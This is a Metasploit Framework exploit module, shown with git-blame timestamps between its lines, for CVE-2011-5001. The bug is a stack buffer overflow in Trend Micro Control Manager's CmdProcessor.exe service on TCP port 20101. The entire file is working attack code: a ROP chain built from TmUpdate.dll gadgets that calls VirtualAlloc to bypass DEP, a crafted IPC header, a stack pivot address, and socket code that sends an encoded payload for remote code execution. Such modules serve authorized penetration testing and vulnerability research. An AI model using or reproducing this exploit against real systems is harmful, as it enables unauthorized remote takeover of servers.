2012-02-23 01:44:47 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = GoodRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability in the CmdProcessor.exe component of Trend
|
|
|
|
Micro Control Manger up to version 5.5.
|
|
|
|
|
|
|
|
The specific flaw exists within CmdProcessor.exe service running on TCP port
|
|
|
|
20101. The vulnerable function is the CGenericScheduler::AddTask function of
|
|
|
|
cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
|
|
|
|
controlled data is copied into a 256-byte stack buffer. This can be exploited
|
|
|
|
to execute remote code under the context of the user.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Luigi Auriemma', #Initial discovery
|
|
|
|
'Blue', #Metasploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2011-5001'],
|
2012-02-23 13:39:31 +00:00
|
|
|
['OSVDB', '77585'],
|
2012-02-23 01:44:47 +00:00
|
|
|
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
2012-05-07 07:41:02 +00:00
|
|
|
'EXITFUNC' => 'process',
|
2012-02-23 01:44:47 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
2012-02-23 23:33:49 +00:00
|
|
|
# TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
|
2012-02-23 01:44:47 +00:00
|
|
|
'Windows 2003 Server SP2 (DEP Bypass)',
|
|
|
|
{
|
|
|
|
'Ret' => 0x666b34c8, # TMNotify.dll stack pivot
|
|
|
|
'Offset' => 5000
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Dec 07 2011",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(20101)
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def junk
|
|
|
|
return rand_text(4).unpack("L")[0].to_i
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
#TmUpdate.dll
|
|
|
|
rop_chain = [
|
|
|
|
0x668074d4, # POP EDX # OR AL,0F6 # RETN
|
|
|
|
0x3FCD0FFC, # Put 00001000 into edx
|
|
|
|
0x667611b2, # ADD EDX,C0330004 # RETN 04
|
|
|
|
0x667c99e7, # POP EBP # RETN [TmUpdate.dll]
|
|
|
|
junk,
|
|
|
|
0x667c99e7, # skip 4 bytes [TmUpdate.dll]
|
|
|
|
0x667e3250, # POP EBX # RETN [TmUpdate.dll]
|
|
|
|
0xffffffff, # NEG EBX
|
|
|
|
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
|
|
|
|
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
|
|
|
|
0x6680a1d3, # POP EAX # RETN [TmUpdate.dll]
|
|
|
|
0xffffffc0, # Value to negate, will become 0x00000040
|
|
|
|
0x66812b53, # NEG EAX # RETN [TmUpdate.dll]
|
|
|
|
0x667f030a, # MOV ECX,EAX # RETN [TmUpdate.dll]
|
|
|
|
0x667d4c7c, # POP EDI # RETN [TmUpdate.dll]
|
|
|
|
0x667e8003, # RETN (ROP NOP) [TmUpdate.dll]
|
|
|
|
0x667d54d0, # POP ESI # RETN [TmUpdate.dll]
|
|
|
|
0x667baf06, # JMP [EAX] [TmUpdate.dll]
|
|
|
|
0x66833376, # POP EAX # RETN [TmUpdate.dll]
|
|
|
|
0x6686115c, # ptr to &VirtualAlloc() [IAT TmUpdate.dll]
|
|
|
|
0x6681ceb3, # PUSHAD # RETN [TmUpdate.dll]
|
|
|
|
0x668382c3, # ptr to 'call esp' [TmUpdate.dll]
|
|
|
|
].pack('V*')
|
|
|
|
#rop chain generated by mona.py
|
|
|
|
|
|
|
|
header = "\x00\x00"
|
|
|
|
header << "\x13\x88" #size of buffer
|
|
|
|
header << rand_text_alpha(9)
|
|
|
|
header << "\x15\x09\x13" #opcode
|
|
|
|
header << "\x00\x00\x00"
|
|
|
|
header << rand_text_alpha(25)
|
|
|
|
header << "\xFE\xFF\xFF\xFF" #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
|
|
|
|
header << "\xFF\xFF\xFF\xFF" #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
|
|
|
|
header << "\xFF\xFF\xF4\xFF" #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
|
|
|
|
header << "\xFF\xFF" #us to our vulnerable function
|
|
|
|
header << rand_text_alpha(1) #align stack again for rop
|
|
|
|
|
|
|
|
pay = rop_chain
|
|
|
|
pay << make_nops(374 - rop_chain.length)
|
2012-02-23 04:59:43 +00:00
|
|
|
pay << "\xeb\x04" #Short jmp 0x04
|
2012-02-23 01:44:47 +00:00
|
|
|
pay << [target.ret].pack('V')
|
|
|
|
pay << payload.encoded
|
|
|
|
|
|
|
|
sploit = header
|
|
|
|
sploit << pay
|
|
|
|
|
|
|
|
filler = rand_text_alpha(target['Offset'] - (sploit.length))
|
|
|
|
|
|
|
|
connect
|
|
|
|
print_status("Sending request...")
|
|
|
|
sock.put(sploit + filler)
|
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|